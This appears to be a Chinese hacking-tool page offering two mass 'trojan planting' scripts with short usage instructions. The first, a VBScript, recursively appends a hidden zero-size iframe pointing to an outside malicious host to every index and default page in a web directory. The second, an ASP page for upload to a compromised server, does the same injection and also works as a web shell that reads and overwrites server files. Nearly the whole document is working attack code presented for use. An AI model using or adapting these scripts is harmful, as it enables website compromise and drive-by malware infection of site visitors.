scan.vbe
cscript scan.vbe web目录
程序代码:
'版权信息
br="************************************" & vbCrLf
br=br & "* VBS 批量挂马脚本 *" & vbCrLf
br=br & "* BY BanLG *" & vbCrLf
br=br & "************************************" & vbCrLf & vbCrLf
br=br & "cscript scan.vbe D:\" & vbCrLf
'马的地址
ma="</Script><IfRAME height=0 width=0 sRc=" & chr(34) & "http://www.hacker.com.cn"&chr( ... t;</IFrAME>"
'要挂马的页面如果嫌不够还可以自己再加,记得要用”|”隔开
MyString="index.php|index.asp|index.html|index.htm|default.php|default.asp|default.html|default.htm|index.aspx|default.aspx"
'以"|"为分隔符拆分成数组
MyArray = Split(MyString, "|", -1, 1)
web=WScript.Arguments(0)
'如果web为空退出脚本
if web="" then
Wscript.echo (br)
window.Close
end if
Wscript.echo (br) & "马的地址:" & ma & vbCrLf & vbCrLf
'创建对象
Set fso = createObject("Scripting.FileSystemObject")
'开始扫描挂马
scan(web)
'scan定义函数,扫描查找符合条件的文件把马的内容写到文件的结尾
sub scan(filesder)
set filesder=fso.getfolder(filesder)
'得到当前目录的所有文件集合
set files=filesder.files
'获取文件名
for each fext in files
Set file1 = fso.GetFile(fext)
filesext=file1.Name
'把文件名转换成小写字母
ext=lcase(filesext)
For Each index in MyArray
'判断文件是不是我们在MyString里限定的文件,如果是就写马
if ext=lcase(index) then
Set ts = fso.OpenTextFile(fext,8) '打开文件并在文件末尾进行写操作
ts.WriteLine(ma)
ts.Close
echo=""
echo=fext & " .............ok"
Wscript.echo (echo)
end if
next
next
set subfolders=filesder.subfolders
for each subfolder in subfolders '搜索其他目录,递归调用
scan(subfolder)
next
end sub
FSO挂马.asp
传进服务器以后 直接输入需要挂马的路径就可以直接挂了
程序代码:
<%Server.ScriptTimeout=10000
Response.Buffer=False
%>
<html>
<head>
<title></title>
<**** http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body>
<%
ASP_SELF=Request.ServerVariables("PATH_INFO")
s=Request("fd")
ex=Request("ex")
pth=Request("pth")
newcnt=Request("newcnt")
If ex<>"" AND pth<>"" Then
select Case ex
Case "edit"
CALL file_show(pth)
Case "save"
CALL file_save(pth)
End select
Else
%>
<form action="<%=ASP_SELF%>" method="POST">
FOLDER (ABSOLUTE PATH):
<input type="text" name="fd" size="40">
<input type="submit" value="SUBMIT">
</form>
<%End If%>
<%
Function IsPattern(patt,str)
Set regEx=New RegExp
regEx.Pattern=patt
regEx.IgnoreCase=True
retVal=regEx.Test(str)
Set regEx=Nothing
If retVal=True Then
IsPattern=True
Else
IsPattern=False
End If
End Function
If IsPattern("[^ab]{1}:{1}(\\|\/)",s) Then
sch s
Else
If s<>"" Then Response.Write "Invalid Agrument!"
End If
Sub sch(s)
oN eRrOr rEsUmE nExT
Set fs=Server.createObject("Scripting.FileSystemObject")
Set fd=fs.GetFolder(s)
Set fi=fd.Files
Set sf=fd.SubFolders
For Each f in fi
rtn=f.Path
step_all rtn
Next
If sf.Count<>0 Then
For Each l In sf
sch l
Next
End If
End Sub
Sub step_all(agr)
retVal=IsPattern("(\\|\/)(default|index)\.(htm|html|asp|php|jsp|aspx)\b",agr)
If retVal Then
step1 agr
step2 agr
Else
Exit Sub
End If
End Sub
%>
<%Sub step1(str1)%>
<a href="<%=ASP_SELF%>?ex=edit&pth=<%=str1%>" target="_blank"><%=str1%></a><br>
<%End Sub%>
<%
Sub step2(str2)
addcode="<iframe src=http://www.21o.net/mm/mm.htm(修改为你的马的地址,不要加""不然会出错) width=0 height=0 frameborder=0></iframe>"
Set fs=Server.createObject("Scripting.FileSystemObject")
isExist=fs.FileExists(str2)
If isExist Then
Set f=fs.GetFile(str2)
Set f_addcode=f.OpenAsTextStream(8,-2)
f_addcode.Write addcode
f_addcode.Close
Set f=Nothing
End If
Set fs=Nothing
End Sub
%>
<%
Sub file_show(fname)
Set fs1=Server.createObject("Scripting.FileSystemObject")
isExist=fs1.FileExists(fname)
If isExist Then
Set fcnt=fs1.OpenTextFile(fname)
cnt=fcnt.ReadAll
fcnt.Close
Set fs1=Nothing%>
FILE: <%=fname%>
<form action="<%=ASP_SELF%>" method="POST">
<textarea name="newcnt" cols="100" rows="30"><%=cnt%></textarea>
<input type="hidden" name="pth" value="<%=fname%>">
<input type="hidden" name="ex" value="save">
<input type="submit" value="SAVE">
</form>
<%Else%>
<p>THE FILE IS NOT EXIT OR HAVE deleteD.</p>
<%
End If
End Sub
%>
<%
Sub file_save(fname)
Set fs2=Server.createObject("Scripting.FileSystemObject")
Set newf=fs2.createTextFile(fname,True)
newf.Write newcnt
newf.Close
Set fs2=Nothing
Response.Write "<p>THE FILE WAS MODIFIED SUCCESSFULLY.</p>"
End Sub
%>
</body>
</html>
您现在的位置: 
